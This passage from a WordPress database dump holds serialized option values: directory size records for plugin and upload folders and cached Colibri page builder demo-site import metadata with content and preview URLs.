ns\";i:24982;s:80:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/popovers\";i:2623;s:71:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components\";i:108683;s:66:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/state\";i:15459;s:73:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/pages/layout\";i:5889;s:66:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/pages\";i:22200;s:65:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/util\";i:2533;s:64:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/api\";i:8533;s:60:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src\";i:207066;s:72:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/app/Controllers\";i:7919;s:60:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/app\";i:48815;s:63:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/routes\";i:2011;s:67:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/editorplus\";i:9951;s:56:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk\";i:767107;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/upgrade\";i:23285;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/features\";i:22531;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/notices\";i:23248;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/seasonal\";i:36462;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/images\";i:151319;s:52:\"/var/www/html/wp-content/plugins/ml-slider/admin/lib\";i:30438;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/slides/tabs\";i:5862;s:61:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/slides\";i:5862;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/notices\";i:1344;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/pages/parts\";i:12580;s:60:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/pages\";i:36578;s:54:\"/var/www/html/wp-content/plugins/ml-slider/admin/views\";i:43784;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox/images/ie6\";i:1300;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox/images\";i:14071;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox\";i:46362;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/tipsy\";i:11953;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor\";i:58315;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/images\";i:354600;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/gutenberg/components\";i:13708;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/gutenberg\";i:16775;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/store/modules\";i:5299;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/store\";i:6365;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/import\";i:6050;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/parts\";i:3182;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/external\";i:20260;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides\";i:32271;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/utils\";i:671;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/assets/styles\";i:3211;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/assets\";i:3211;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/extra\";i:3999;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/notices\";i:7698;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/previews\";i:10131;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows/settings\";i:6122;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows/nav\";i:22887;s:73:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows\";i:45019;s:67:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/tour\";i:3994;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/themes\";i:21443;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/api/external\";i:1331;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/api\";i:9106;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs/alerts\";i:1159;s:87:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs/shimmers\";i:4492;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs\";i:15035;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/components\";i:1598;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/pages\";i:35409;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/stubs\";i:2257;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/layouts\";i:872;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings\";i:57334;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app\";i:210523;s:58:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js\";i:252716;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/common/css\";i:675;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/common\";i:675;s:87:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/content-visible\";i:1437;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/chosen\";i:58825;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/facebook\";i:17168;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/testbed\";i:1091;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/tooltip\";i:4749;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/dolls\";i:2160;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/viewport\";i:3831;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/simple\";i:992;s:86:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/element-scroll\";i:30018;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/pin\";i:1037;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/out-of-bounds\";i:1271;s:86:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/enable-disable\";i:1248;s:84:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources/js\";i:337915;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources/css\";i:134;s:81:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources\";i:338049;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/scroll\";i:58996;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples\";i:521547;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/js\";i:46157;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css/helpers\";i:8114;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css/mixins\";i:216;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css\";i:9515;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src\";i:55672;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist/js\";i:81821;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist/css\";i:30389;s:67:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist\";i:112210;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether\";i:704613;s:81:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/eager\";i:3360;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/js\";i:15039;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/css\";i:24952;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src\";i:43351;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/eager\";i:4842;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/js\";i:79728;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/css\";i:77153;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist\";i:161723;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd\";i:219938;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/gutenberg\";i:1139;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/components\";i:4184;s:65:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/parts\";i:198;s:59:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css\";i:34631;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist/js\";i:1314136;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist/css\";i:5069614;s:60:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist\";i:6383750;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets\";i:8009133;s:56:\"/var/www/html/wp-content/plugins/ml-slider/admin/support\";i:13107;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/slideshows/slides\";i:7963;s:59:\"/var/www/html/wp-content/plugins/ml-slider/admin/slideshows\";i:62698;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/routes\";i:37938;s:48:\"/var/www/html/wp-content/plugins/ml-slider/admin\";i:8389232;s:42:\"/var/www/html/wp-content/plugins/ml-slider\";i:19749420;s:101:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes/wp-content-importer-v2/src\";i:95981;s:97:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes/wp-content-importer-v2\";i:97633;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes\";i:97633;s:69:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/composer\";i:19632;s:60:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor\";i:117434;s:83:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/migration\";i:2650;s:81:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/options\";i:272;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/page\";i:573733;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/header\";i:180882;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/main\";i:244118;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/footer\";i:8403;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials\";i:1133542;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3\";i:1183765;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/page\";i:590322;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/header\";i:176218;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/main\";i:244311;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/footer\";i:8403;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials\";i:1145660;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1\";i:1198615;s:97:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/sidebar\";i:125785;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/header\";i:381697;s:94:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/main\";i:241524;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/footer\";i:8377;s:89:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials\";i:757383;s:80:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import\";i:801749;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/page\";i:583711;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/header\";i:202156;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/main\";i:244124;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/footer\";i:8377;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials\";i:1164774;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2\";i:1215331;s:73:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data\";i:4457081;s:93:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/integrations/woocommerce\";i:3575;s:81:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/integrations\";i:7892;s:95:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/features/multiple-partials\";i:1152;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/features\";i:1240;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/images\";i:1348874;s:85:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/js\";i:7995250;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/fancybox\";i:81009;s:88:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/fonts\";i:372837;s:86:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/css\";i:1723004;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static\";i:10924300;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/partials-images\";i:2307114;s:75:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets\";i:14589148;s:72:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/api\";i:9915;s:101:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer/editor-data/page-list\";i:1226;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer/editor-data\";i:9789;s:79:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer\";i:21309;s:84:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/shortcodes/blog\";i:36287;s:79:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/shortcodes\";i:136054;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/partials/blog\";i:2927;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/partials\";i:28916;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/admin\";i:6;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder\";i:19346292;s:71:\"/var/www/html/wp-content/plugins/colibri-page-builder/utils/pro-upgrade\";i:2287;s:59:\"/var/www/html/wp-content/plugins/colibri-page-builder/utils\";i:23493;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/js/customizer\";i:120592;s:63:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/js\";i:124761;s:64:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/css\";i:50627;s:65:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/ocdi\";i:15808;s:60:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets\";i:194713;s:75:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer/Panels\";i:1955;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer/Settings\";i:1065;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer\";i:30436;s:64:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Notify\";i:10237;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport/Views\";i:5068;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport/Hooks\";i:19932;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport\";i:30421;s:65:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/License\";i:35174;s:62:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/OCDI\";i:111987;s:63:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Utils\";i:3262;s:57:\"/var/www/html/wp-content/plugins/colibri-page-builder/src\";i:267378;s:69:\"/var/www/html/wp-content/plugins/colibri-page-builder/recommendations\";i:21951;s:61:\"/var/www/html/wp-content/plugins/colibri-page-builder/support\";i:875;s:67:\"/var/www/html/wp-content/plugins/colibri-page-builder/demo-importer\";i:13604;s:53:\"/var/www/html/wp-content/plugins/colibri-page-builder\";i:20020501;s:32:\"/var/www/html/wp-content/plugins\";i:179795926;s:44:\"/var/www/html/wp-content/uploads/astra-sites\";i:0;s:40:\"/var/www/html/wp-content/uploads/colibri\";i:7223865;s:40:\"/var/www/html/wp-content/uploads/2022/01\";i:0;s:40:\"/var/www/html/wp-content/uploads/2022/03\";i:69212067;s:40:\"/var/www/html/wp-content/uploads/2022/02\";i:31272783;s:37:\"/var/www/html/wp-content/uploads/2022\";i:100484850;s:40:\"/var/www/html/wp-content/uploads/2021/11\";i:6932170;s:40:\"/var/www/html/wp-content/uploads/2021/12\";i:40402;s:40:\"/var/www/html/wp-content/uploads/2021/06\";i:1984397;s:40:\"/var/www/html/wp-content/uploads/2021/10\";i:16182290;s:40:\"/var/www/html/wp-content/uploads/2021/07\";i:0;s:40:\"/var/www/html/wp-content/uploads/2021/04\";i:15148226;s:40:\"/var/www/html/wp-content/uploads/2021/05\";i:0;s:40:\"/var/www/html/wp-content/uploads/2021/08\";i:1438377;s:40:\"/var/www/html/wp-content/uploads/2021/09\";i:5929633;s:37:\"/var/www/html/wp-content/uploads/2021\";i:47655495;s:49:\"/var/www/html/wp-content/uploads/elementor/thumbs\";i:63128;s:46:\"/var/www/html/wp-content/uploads/elementor/css\";i:25563;s:42:\"/var/www/html/wp-content/uploads/elementor\";i:88691;s:32:\"/var/www/html/wp-content/uploads\";i:155452901;}','yes'),(347,'cp_initialize_notifications','1644939950','yes'),(348,'colibri_page_builder_demo_sites','a:2:{s:9:\"timestamp\";i:1732908486;s:4:\"data\";a:99:{i:0;a:11:{s:16:\"import_file_name\";s:10:\"Business I\";s:4:\"slug\";s:8:\"business\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/customizer.dat\";s:24:\"import_preview_image_url\";s:90:\"https://static.colibriwp.com/templates-screenshots/colibri_default_business/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-i/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:04.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:1;a:11:{s:16:\"import_file_name\";s:11:\"Business II\";s:4:\"slug\";s:11:\"business-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/business-ii/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:06.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:2;a:11:{s:16:\"import_file_name\";s:7:\"Plumber\";s:4:\"slug\";s:7:\"plumber\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/plumber/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/plumber/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:07.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:3;a:11:{s:16:\"import_file_name\";s:17:\"Creative Agency I\";s:4:\"slug\";s:11:\"advertising\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/customizer.dat\";s:24:\"import_preview_image_url\";s:97:\"https://static.colibriwp.com/templates-screenshots/colibri_default_creative_agency/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/creative-agency-i/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:09.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:4;a:11:{s:16:\"import_file_name\";s:3:\"SEO\";s:4:\"slug\";s:3:\"seo\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/content.xml\";s:22:\"import_widget_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/widgets.wie\";s:26:\"import_customizer_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/colibri_default_seo/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/seo-demo/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:5;a:11:{s:16:\"import_file_name\";s:11:\"IT Services\";s:4:\"slug\";s:11:\"it-services\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/it-services/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/it-services\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:13.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:6;a:11:{s:16:\"import_file_name\";s:20:\"Designer Portfolio I\";s:4:\"slug\";s:20:\"designer-portfolio-i\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-i/screenshot.png\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/designer-portfolio-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:7;a:11:{s:16:\"import_file_name\";s:21:\"Designer Portfolio II\";s:4:\"slug\";s:21:\"designer-portfolio-ii\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/content.xml\";s:22:\"import_widget_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:87:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-ii/screenshot.png\";s:11:\"preview_url\";s:58:\"https://colibriwp-work.colibriwp.com/designer-portfolio-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:16.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:8;a:11:{s:16:\"import_file_name\";s:12:\"Business III\";s:4:\"slug\";s:12:\"business-iii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/business-iii/screenshot.png\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/business-iii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 